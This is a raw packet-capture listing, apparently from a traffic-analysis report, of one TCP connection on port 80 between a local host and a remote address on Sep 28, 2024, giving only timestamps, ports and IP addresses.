Sep 28, 2024 21:26:17.515778065 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515786886 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515798092 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515813112 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515815020 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515826941 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515836954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515841961 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515847921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515858889 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515861034 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515873909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515877962 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515892029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515902042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515907049 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515913010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515924931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515925884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515933990 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515944004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515944958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.515955925 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515965939 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515978098 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.515980959 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516000032 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516019106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516035080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516568899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516578913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516587973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516598940 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516609907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516613007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516624928 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516632080 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516635895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516654015 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516673088 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516745090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516757011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516766071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516777992 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516788006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516791105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516798973 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516810894 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516812086 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516851902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516880989 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516891956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516902924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516911030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516920090 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516932011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516941071 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516942024 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516957998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516961098 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.516968012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.516980886 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517010927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517623901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517638922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517647982 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517658949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517668962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517676115 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517680883 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517692089 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517698050 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517703056 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517714977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517733097 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517735958 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517760038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517760038 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517772913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517779112 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517786026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517796040 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517798901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517811060 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517815113 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517823935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517836094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517855883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517855883 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517880917 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.517939091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517951012 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517960072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517970085 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.517985106 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518016100 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518424034 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518490076 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518611908 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518623114 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518631935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518644094 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518654108 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518661976 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518666029 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518676996 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518687010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518691063 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518697977 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518709898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518709898 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518719912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518732071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.518733025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518758059 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.518779993 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519118071 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519130945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519140005 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519150972 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519159079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519162893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519191980 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519218922 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519263983 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519275904 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519284010 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519295931 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519306898 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519313097 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519316912 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519328117 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519342899 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519354105 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519365072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519368887 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519368887 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519376040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519393921 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519403934 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519408941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519408941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519414902 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519428968 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519433022 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519443989 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519445896 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519454956 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.519481897 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.519512892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520153046 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520164013 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520173073 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520184040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520193100 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520201921 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520205975 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520217896 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520222902 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520231962 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520241976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520242929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520252943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520263910 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520263910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520282030 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520287037 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520292997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520303965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520314932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520324945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520325899 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520335913 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520343065 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520348072 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520359993 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520366907 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520371914 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520382881 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520392895 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520400047 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520405054 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520418882 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520426035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520445108 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520461082 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.520925045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520936966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520946980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520957947 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.520972967 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521011114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521011114 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521064997 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521081924 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521091938 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521102905 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521112919 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521111012 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521125078 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521136045 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521147966 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521151066 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521152020 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521159887 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521173954 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521183014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521183014 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521202087 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521210909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521225929 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521250010 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521421909 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521435976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521446943 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521457911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521469116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521470070 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521471024 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521480083 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521491051 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521492004 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521531105 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521562099 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521578074 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521589994 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521604061 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521615028 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521625042 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521625996 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521636009 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521646976 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521652937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521652937 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521688938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521725893 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521739006 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521748066 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521758080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521768093 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521771908 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521780014 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521791935 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.521795988 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521830082 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.521859884 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.561868906 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.561891079 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.561899900 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.561937094 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.561958075 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.561964035 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.561970949 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562001944 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562048912 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562093019 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562103987 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562119007 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562129021 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562139988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562140942 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562171936 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562201977 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562300920 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562313080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562345982 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562375069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562407017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562417984 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562427998 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562455893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562457085 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562489986 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.562962055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.562994957 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563004017 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563007116 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.563041925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.563041925 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.563081980 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563093901 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563127995 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.563182116 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563194036 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563204050 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.563226938 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.563257933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565001011 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565011978 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565022945 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565054893 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565073967 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565085888 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565089941 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565098047 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565114975 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565149069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565149069 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565258026 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565268040 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565278053 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565287113 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565298080 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565305948 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565310001 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565321922 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565324068 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565356970 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565383911 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565499067 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565510988 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.565547943 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.565982103 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566008091 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566015959 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566030025 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566062927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566062927 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566111088 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566122055 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566155910 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566195965 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566206932 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566242933 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566346884 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566356897 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566366911 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566379070 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566387892 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566390038 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566405058 CEST	80	49732	185.215.113.37	192.168.2.4
Sep 28, 2024 21:26:17.566405058 CEST	49732	80	192.168.2.4	185.215.113.37
Sep 28, 2024 21:26:17.566447020 CEST	49732	80	192.168.2.4	185.215.113.37
